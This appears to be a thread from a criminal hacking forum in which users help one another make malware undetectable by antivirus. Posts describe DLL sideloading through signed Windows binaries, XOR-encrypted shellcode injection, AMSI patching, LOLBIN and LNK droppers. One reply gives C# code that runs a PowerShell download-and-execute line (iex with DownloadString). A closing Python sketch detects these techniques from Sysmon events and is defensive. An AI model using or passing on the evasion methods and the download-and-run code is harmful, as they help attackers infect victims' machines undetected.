Help with my malware

A Checkzilla scan is not enough to know if it's really FUD or not, because there is no internet connection. Once you download the file it gets flagged as malware; that means the file is not FUD and is detected at scantime. You need a FUD crypt to bypass this.
DLL sideloading/proxying is a good method to bypass AVs, you just need to be careful with the shellcode and injection method.
 
Please note that the user is banned
I use my private method and it's 0/19 for now at runtime and scantime.
 
Hmm, I use Windows officially signed exes like runtimebroker.exe etc. to load DLLs and inject shellcode into the process with XOR enc and a 1st-byte change. I am using stageless shellcode, 180kb of shellcode though, too big. Can you suggest me more ways? Again, I am not asking for your private method :)
 
Please note that the user is banned
Suggest, yes, of course. If you like to use an AMSI bypass you can use PowerShell without powershell, like the same project here https://xss.pro/threads/75684/

C#:
Runspace runspaceKhamisla = RunspaceFactory.CreateRunspace(RunspaceConfiguration.Create());
runspaceKhamisla.Open();
Pipeline pipeline = runspaceKhamisla.CreatePipeline();
pipeline.Commands.AddScript("$ps1url = '';iex(New-Object Net.WebClient).DownloadString($ps1url)");
pipeline.Invoke();

But this time compile it as a DLL and then use ildasm and edit the .il file and export the function manually, then patch AMSI. Here it will give you FUD 100%.

:)
 

Try using different LOLBINs (living off the land binaries) and find one that was recently added or found, and also add some obfuscation or more layers between your LNK and downloading your file.

I haven't taken a look at your LNK, but from other replies I'm assuming it's downloading the stub directly. Try having it create a js/ps1 file instead, where it can execute the download with more sophistication.
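From the defender's side, the two tricks discussed in this thread (a signed Windows binary such as runtimebroker.exe loading a planted DLL, and the PowerShell engine hosted in a non-PowerShell process) both leave image-load telemetry. The following is an added detection sketch, not code from the thread or from any project linked here; it runs over constructed Sysmon Event ID 7 (ImageLoad) records, and the field names, paths and PIDs in the sample are assumptions.

```python
# Added example: flag Sysmon ImageLoad (Event ID 7) records for two patterns:
#  1. System.Management.Automation.dll loaded by a process that is not a
#     PowerShell host ("PowerShell without powershell").
#  2. A binary living under a trusted system directory loading an unsigned DLL
#     from a path outside those directories (sideloading/proxying pattern).
# The sample events below are constructed for illustration only.

POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
ENGINE_DLLS = {"system.management.automation.dll",
               "system.management.automation.ni.dll"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\",
                "c:\\program files (x86)\\")

# Constructed subset of Sysmon Event 7 fields. "Signed" describes ImageLoaded.
SAMPLE_EVENTS = [
    {"EventID": 7, "ProcessId": 4120, "Signed": "true",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation.dll"},
    {"EventID": 7, "ProcessId": 5208, "Signed": "true",
     "Image": r"C:\Users\alice\AppData\Local\Temp\updater.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation.dll"},
    {"EventID": 7, "ProcessId": 1337, "Signed": "false",
     "Image": r"C:\Windows\System32\RuntimeBroker.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\version.dll"},
    {"EventID": 7, "ProcessId": 1337, "Signed": "true",
     "Image": r"C:\Windows\System32\RuntimeBroker.exe",
     "ImageLoaded": r"C:\Windows\System32\combase.dll"},
]


def basename(path):
    """Lower-cased final path component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def in_trusted_dir(path):
    return path.lower().startswith(TRUSTED_DIRS)


def analyze(events):
    """Return one finding dict per suspicious ImageLoad record."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 7:
            continue
        proc, dll = ev["Image"], ev["ImageLoaded"]
        if basename(dll) in ENGINE_DLLS and basename(proc) not in POWERSHELL_HOSTS:
            findings.append({"pid": ev["ProcessId"], "image": proc,
                             "reason": "powershell-engine-in-foreign-host"})
        elif (in_trusted_dir(proc) and not in_trusted_dir(dll)
              and ev.get("Signed", "false").lower() != "true"):
            findings.append({"pid": ev["ProcessId"], "image": proc,
                             "reason": "unsigned-dll-from-untrusted-path"})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Against the constructed sample this reports the Temp-resident updater.exe hosting the PowerShell engine and RuntimeBroker.exe loading an unsigned DLL from AppData, while the two legitimate loads are ignored.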
 